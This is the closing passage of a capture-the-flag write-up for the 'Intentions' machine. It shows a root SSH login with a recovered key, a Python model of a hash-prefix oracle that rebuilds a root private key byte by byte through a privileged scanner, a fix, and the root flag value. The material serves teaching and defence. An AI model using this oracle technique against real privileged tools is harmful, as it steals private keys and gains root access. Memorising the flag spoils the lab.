-----BEGIN OPENSSH PRIVATE KEY-----
...
-----END OPENSSH PRIVATE KEY-----
└─$ nano root.id_rsa
└─$ chmod 600 root.id_rsa
└─$ ssh -i root.id_rsa root@intentions.htb
root@intentions:~# id
uid=0(root) gid=0(root) groups=0(root)
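The same oracle, modelled offline as an added example (not the writeup's script and not the real scanner binary): the Scanner class reproduces the only behaviour that matters, hashing the first -l bytes of the file and reporting whether the digest equals -s, and recover() is the general prefix-extension algorithm with a query counter so the cost is visible. SECRET is a constructed stand-in for /root/.ssh/id_rsa.

```python
import hashlib
import string

# Constructed stand-in for /root/.ssh/id_rsa; only the structure matters here.
SECRET = (b"-----BEGIN OPENSSH PRIVATE KEY-----\n"
          b"b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW\n"
          b"-----END OPENSSH PRIVATE KEY-----\n")

KNOWN_PREFIX = b"-----BEGIN OPENSSH PRIVATE KEY-----\n"


class Scanner:
    """Model of /opt/scanner/scanner -c FILE -l LIMIT -s HASH: the tool hashes only the
    first LIMIT bytes of FILE and reports a match when that digest equals HASH."""

    def __init__(self, data: bytes):
        self.data = data
        self.queries = 0

    def check(self, limit: int, candidate_md5: str) -> bool:
        self.queries += 1
        return hashlib.md5(self.data[:limit]).hexdigest() == candidate_md5


def recover(scanner: Scanner, known: bytes = b"",
            alphabet: bytes = string.printable.encode(), max_len: int = 1 << 16) -> bytes:
    """Extend a known prefix one byte at a time.

    Each position costs at most len(alphabet) queries. The loop stops when no candidate
    byte matches, which happens once the guess is longer than the file.
    """
    out = bytearray(known)
    while len(out) < max_len:
        for b in alphabet:
            guess = bytes(out) + bytes([b])
            if scanner.check(len(guess), hashlib.md5(guess).hexdigest()):
                out.append(b)
                break
        else:
            break
    return bytes(out)


def demo() -> dict:
    """Recover SECRET through the oracle and report the query cost against its bound."""
    s = Scanner(SECRET)
    recovered = recover(s, known=KNOWN_PREFIX)
    positions = len(SECRET) - len(KNOWN_PREFIX) + 1   # +1 for the final terminating pass
    return {"recovered": recovered == SECRET, "queries": s.queries,
            "upper_bound": len(string.printable) * positions}
```

The defence follows from the model: a checker that runs with read access to files its caller cannot read must not let the caller choose both the file and the hash length. Hashing the whole file regardless of -l, or restricting -c to the upload directory, removes the oracle.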

Root.txt

root@intentions:~# cat /root/root.txt
a98f16edd09fe4e839173bef5da277d3
